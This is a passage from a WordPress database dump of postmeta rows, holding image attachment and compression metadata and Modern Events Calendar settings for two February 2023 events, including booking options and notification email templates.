\";s:8:\"keywords\";a:0:{}}}'),(176167,267799,'original-file','2023/02/comcast-1a-updraft-pre-smush-original.jpg'),(176168,267799,'smush-complete','1'),(176169,267799,'smush-info','The file was compressed from 40.24 KB to 31.98 KB saving 20.52 percent using WP-Optimize'),(176170,267799,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:41204;s:12:\"smushed-size\";i:32748;s:15:\"savings-percent\";d:20.52;s:10:\"sizes-info\";a:6:{s:4:\"full\";a:2:{s:8:\"original\";i:41204;s:10:\"compressed\";i:32748;}s:6:\"medium\";a:2:{s:8:\"original\";i:9870;s:10:\"compressed\";i:9824;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:4755;s:10:\"compressed\";i:4709;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:12216;s:10:\"compressed\";i:11877;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:12950;s:10:\"compressed\";i:12707;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:10446;s:10:\"compressed\";i:10264;}}}'),(176171,267800,'original-file','2023/02/comcast-2-updraft-pre-smush-original.jpg'),(176172,267800,'smush-complete','1'),(176173,267800,'smush-info','The file was compressed from 114.05 KB to 85.03 KB saving 25.44 percent using WP-Optimize'),(176174,267800,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:116785;s:12:\"smushed-size\";i:87073;s:15:\"savings-percent\";d:25.44;s:10:\"sizes-info\";a:10:{s:4:\"full\";a:2:{s:8:\"original\";i:116785;s:10:\"compressed\";i:87073;}s:6:\"medium\";a:2:{s:8:\"original\";i:3296;s:10:\"compressed\";i:3250;}s:5:\"large\";a:2:{s:8:\"original\";i:19073;s:10:\"compressed\";i:18295;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:2922;s:10:\"compressed\";i:2876;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:12496;s:10:\"compressed\";i:12129;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:7422;s:10:\"compressed\";i:7376;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:10391;s:10:\"compressed\";i:10357;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:7579;s:10:\"compressed\";i:7533;}s:8:\"tileview\";a:2:{s:8:\"original\";i:8437;s:10:\"compressed\";i:8391;}s:9:\"1536x1536\";a:2:{s:8:\"original\";i:34124;s:10:\"compressed\";i:33169;}}}'),(176175,267801,'original-file','2023/02/comcast-3-updraft-pre-smush-original.jpg'),(176176,267801,'smush-complete','1'),(176177,267801,'smush-info','The file was compressed from 132.14 KB to 97.86 KB saving 25.94 percent using WP-Optimize'),(176178,267801,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:135309;s:12:\"smushed-size\";i:100212;s:15:\"savings-percent\";d:25.94;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:135309;s:10:\"compressed\";i:100212;}s:6:\"medium\";a:2:{s:8:\"original\";i:6377;s:10:\"compressed\";i:6331;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:2158;s:10:\"compressed\";i:2112;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:28298;s:10:\"compressed\";i:27162;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:6220;s:10:\"compressed\";i:6174;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:11315;s:10:\"compressed\";i:10996;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:7840;s:10:\"compressed\";i:7794;}s:8:\"tileview\";a:2:{s:8:\"original\";i:6793;s:10:\"compressed\";i:6747;}}}'),(176181,267802,'_wp_attached_file','2023/02/comcast-4.jpg'),(176182,267802,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1006;s:6:\"height\";i:804;s:4:\"file\";s:21:\"2023/02/comcast-4.jpg\";s:8:\"filesize\";i:156548;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"comcast-4-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7668;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"comcast-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2662;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"comcast-4-768x614.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:614;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32372;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:21:\"comcast-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7654;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:21:\"comcast-4-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14029;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:21:\"comcast-4-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9883;}s:8:\"tileview\";a:5:{s:4:\"file\";s:21:\"comcast-4-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9185;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(176183,267803,'_wp_attached_file','2023/02/comcast-3b.jpg'),(176184,267803,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1005;s:6:\"height\";i:823;s:4:\"file\";s:22:\"2023/02/comcast-3b.jpg\";s:8:\"filesize\";i:168321;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"comcast-3b-300x246.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:246;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8095;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"comcast-3b-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2651;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"comcast-3b-768x629.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:629;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35014;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:22:\"comcast-3b-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8212;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:22:\"comcast-3b-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13932;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:22:\"comcast-3b-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9875;}s:8:\"tileview\";a:5:{s:4:\"file\";s:22:\"comcast-3b-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7986;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(176185,267804,'_wp_attached_file','2023/02/comcast-5.jpg'),(176186,267804,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1000;s:6:\"height\";i:813;s:4:\"file\";s:21:\"2023/02/comcast-5.jpg\";s:8:\"filesize\";i:139605;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"comcast-5-300x244.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:244;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6837;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"comcast-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2334;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"comcast-5-768x624.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:624;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30470;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:21:\"comcast-5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6939;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:21:\"comcast-5-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11475;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:21:\"comcast-5-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8153;}s:8:\"tileview\";a:5:{s:4:\"file\";s:21:\"comcast-5-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6856;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(176187,267803,'original-file','2023/02/comcast-3b-updraft-pre-smush-original.jpg'),(176188,267803,'smush-complete','1'),(176189,267803,'smush-info','The file was compressed from 164.38 KB to 125.65 KB saving 23.56 percent using WP-Optimize'),(176190,267803,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:168321;s:12:\"smushed-size\";i:128666;s:15:\"savings-percent\";d:23.56;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:168321;s:10:\"compressed\";i:128666;}s:6:\"medium\";a:2:{s:8:\"original\";i:8095;s:10:\"compressed\";i:8049;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:2651;s:10:\"compressed\";i:2605;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:35014;s:10:\"compressed\";i:33894;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:8212;s:10:\"compressed\";i:8166;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:13932;s:10:\"compressed\";i:13776;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:9875;s:10:\"compressed\";i:9829;}s:8:\"tileview\";a:2:{s:8:\"original\";i:7986;s:10:\"compressed\";i:7940;}}}'),(176191,267804,'original-file','2023/02/comcast-5-updraft-pre-smush-original.jpg'),(176192,267804,'smush-complete','1'),(176193,267804,'smush-info','The file was compressed from 136.33 KB to 101.16 KB saving 25.8 percent using WP-Optimize'),(176194,267804,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:139605;s:12:\"smushed-size\";i:103584;s:15:\"savings-percent\";d:25.8;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:139605;s:10:\"compressed\";i:103584;}s:6:\"medium\";a:2:{s:8:\"original\";i:6837;s:10:\"compressed\";i:6791;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:2334;s:10:\"compressed\";i:2288;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:30470;s:10:\"compressed\";i:29291;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:6939;s:10:\"compressed\";i:6893;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:11475;s:10:\"compressed\";i:11241;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:8153;s:10:\"compressed\";i:8107;}s:8:\"tileview\";a:2:{s:8:\"original\";i:6856;s:10:\"compressed\";i:6810;}}}'),(176195,267802,'original-file','2023/02/comcast-4-updraft-pre-smush-original.jpg'),(176196,267802,'smush-complete','1'),(176197,267802,'smush-info','The file was compressed from 152.88 KB to 114.71 KB saving 24.97 percent using WP-Optimize'),(176198,267802,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:156548;s:12:\"smushed-size\";i:117462;s:15:\"savings-percent\";d:24.97;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:156548;s:10:\"compressed\";i:117462;}s:6:\"medium\";a:2:{s:8:\"original\";i:7668;s:10:\"compressed\";i:7622;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:2662;s:10:\"compressed\";i:2616;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:32372;s:10:\"compressed\";i:31875;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:7654;s:10:\"compressed\";i:7608;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:14029;s:10:\"compressed\";i:13782;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:9883;s:10:\"compressed\";i:9837;}s:8:\"tileview\";a:2:{s:8:\"original\";i:9185;s:10:\"compressed\";i:9139;}}}'),(176199,267807,'protect_children',''),(176200,267807,'mec_color',''),(176201,267807,'mec_location_id','166'),(176202,267807,'mec_dont_show_map','0'),(176203,267807,'mec_organizer_id','1'),(176204,267807,'mec_start_date','2023-02-11'),(176205,267807,'mec_start_time_hour','10'),(176206,267807,'mec_start_time_minutes','30'),(176207,267807,'mec_start_time_ampm','AM'),(176208,267807,'mec_start_day_seconds','37800'),(176209,267807,'mec_end_date','2023-02-11'),(176210,267807,'mec_end_time_hour','11'),(176211,267807,'mec_end_time_minutes','30'),(176212,267807,'mec_end_time_ampm','AM'),(176213,267807,'mec_end_day_seconds','41400'),(176214,267807,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-02-11\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-02-11\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(176215,267807,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(176216,267807,'mec_certain_weekdays','a:0:{}'),(176217,267807,'mec_allday','0'),(176218,267807,'mec_hide_time','0'),(176219,267807,'mec_hide_end_time','0'),(176220,267807,'mec_comment',''),(176221,267807,'mec_repeat_status','0'),(176222,267807,'mec_repeat_type',''),(176223,267807,'mec_repeat_interval','1'),(176224,267807,'mec_repeat_end',''),(176225,267807,'mec_repeat_end_at_occurrences',''),(176226,267807,'mec_repeat_end_at_date',''),(176227,267807,'mec_advanced_days','a:0:{}'),(176228,267807,'mec_in_days',''),(176229,267807,'mec_not_in_days',''),(176230,267807,'mec_hourly_schedules','a:0:{}'),(176231,267807,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(176232,267807,'mec_tickets','a:0:{}'),(176233,267807,'mec_fees_global_inheritance','1'),(176234,267807,'mec_fees','a:0:{}'),(176235,267807,'mec_ticket_variations_global_inheritance','1'),(176236,267807,'mec_ticket_variations','a:0:{}'),(176237,267807,'mec_reg_fields_global_inheritance','1'),(176238,267807,'mec_reg_fields','a:0:{}'),(176239,267807,'mec_op','a:0:{}'),(176240,267807,'mec_event_date_submit','20210422105713'),(176241,267807,'mec_read_more',''),(176242,267807,'mec_more_info',''),(176243,267807,'mec_more_info_title',''),(176244,267807,'mec_more_info_target','_self'),(176245,267807,'mec_cost',''),(176246,267807,'mec_currency','a:0:{}'),(176247,267807,'mec_additional_organizer_ids','a:0:{}'),(176248,267807,'mec_additional_location_ids','a:0:{}'),(176249,267807,'one_occurrence','0'),(176250,267807,'mec_timezone','global'),(176251,267807,'mec_countdown_method','global'),(176252,267807,'mec_public','1'),(176253,267807,'mec_bfixed_fields','a:0:{}'),(176254,267807,'mec_fields','a:0:{}'),(176255,267807,'mec_event_status','EventScheduled'),(176256,267807,'mec_moved_online_link',''),(176257,267807,'mec_cancelled_reason',''),(176258,267807,'mec_display_cancellation_reason_in_single_page',''),(176259,267807,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(176260,267807,'passster_activate_global_protection',NULL),(176261,267807,'passster_activate_protection',NULL),(176262,267807,'passster_protection_type','password'),(176263,267807,'_wp_old_date','2022-01-18'),(176264,267807,'boldgrid_in_page_containers','1'),(176265,267807,'_oembed_feb482e9f1973a04e96ed04d346ebf98','{{unknown}}'),(176268,267807,'_dp_original','267573'),(176267,267807,'_thumbnail_id','267574'),(176269,267807,'_edit_lock','1675381175:2'),(176270,267807,'_edit_last','2'),(176271,267809,'protect_children',''),(176272,267809,'mec_color',''),(176273,267809,'mec_location_id','132'),(176274,267809,'mec_dont_show_map','0'),(176275,267809,'mec_organizer_id','1'),(176276,267809,'mec_read_more',''),(176277,267809,'mec_more_info',''),(176278,267809,'mec_more_info_title',''),(176279,267809,'mec_more_info_target','_self'),(176280,267809,'mec_cost',''),(176281,267809,'mec_currency','a:0:{}'),(176282,267809,'mec_additional_organizer_ids','a:0:{}'),(176283,267809,'mec_additional_location_ids','a:0:{}'),(176284,267809,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-02-05\";s:4:\"hour\";s:1:\"4\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-02-05\";s:4:\"hour\";s:1:\"5\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(176285,267809,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(176286,267809,'mec_certain_weekdays','a:0:{}'),(176287,267809,'mec_allday','0'),(176288,267809,'one_occurrence','0'),(176289,267809,'mec_hide_time','0'),(176290,267809,'mec_hide_end_time','0'),(176291,267809,'mec_comment',''),(176292,267809,'mec_timezone','global'),(176293,267809,'mec_countdown_method','global'),(176294,267809,'mec_public','1'),(176295,267809,'mec_start_date','2023-02-05'),(176296,267809,'mec_start_time_hour','4'),(176297,267809,'mec_start_time_minutes','0'),(176298,267809,'mec_start_time_ampm','PM'),(176299,267809,'mec_start_day_seconds','57600'),(176300,267809,'mec_end_date','2023-02-05'),(176301,267809,'mec_end_time_hour','5'),(176302,267809,'mec_end_time_minutes','30'),(176303,267809,'mec_end_time_ampm','PM'),(176304,267809,'mec_end_day_seconds','63000'),(176305,267809,'mec_repeat_status','0'),(176306,267809,'mec_repeat_type',''),(176307,267809,'mec_repeat_interval','1'),(176308,267809,'mec_repeat_end',''),(176309,267809,'mec_repeat_end_at_occurrences',''),(176310,267809,'mec_repeat_end_at_date',''),(176311,267809,'mec_advanced_days','a:0:{}'),(176312,267809,'mec_in_days',''),(176313,267809,'mec_not_in_days',''),(176314,267809,'mec_hourly_schedules','a:0:{}'),(176315,267809,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(176316,267809,'mec_tickets','a:0:{}'),(176317,267809,'mec_fees_global_inheritance','1'),(176318,267809,'mec_fees','a:0:{}'),(176319,267809,'mec_ticket_variations_global_inheritance','1'),(176320,267809,'mec_ticket_variations','a:0:{}'),(176321,267809,'mec_reg_fields_global_inheritance','1'),(176322,267809,'mec_reg_fields','a:0:{}'),(176323,267809,'mec_bfixed_fields','a:0:{}'),(176324,267809,'mec_op','a:0:{}'),(176325,267809,'mec_fields','a:0:{}'),(176326,267809,'mec_event_status','EventScheduled'),(176327,267809,'mec_moved_online_link',''),(176328,267809,'mec_cancelled_reason',''),(176329,267809,'mec_display_cancellation_reason_in_single_page',''),(176330,267809,'boldgrid_hide_page_title','0'),(176331,267809,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(176332,267809,'passster_activate_global_protection',NULL),(176333,267809,'passster_activate_protection',NULL),(176334,267809,'passster_protection_type','password'),(176335,267809,'boldgrid_in_page_containers','1'),(176337,267809,'_dp_original','267696'),(176338,267809,'_edit_lock','1675382432:2'),(176339,267809,'_edit_last','2'),(176340,267810,'_wp_attached_file','2023/02/blue-butterfly-4.jpg'),(176341,267810,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:846;s:6:\"height\";i:475;s:4:\"file\";s:28:\"2023/02/blue-butterfly-4.jpg\";s:8:\"filesize\";i:90758;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:28:\"blue-butterfly-4-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16198;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:28:\"blue-butterfly-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8202;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:28:\"blue-butterfly-4-768x431.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:431;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67819;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:28:\"blue-butterfly-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23881;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:28:\"blue-butterfly-4-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38324;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:28:\"blue-butterfly-4-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27939;}s:8:\"tileview\";a:5:{s:4:\"file\";s:28:\"blue-butterfly-4-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28293;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(176342,267809,'_thumbnail_id','267810'),(178523,268171,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s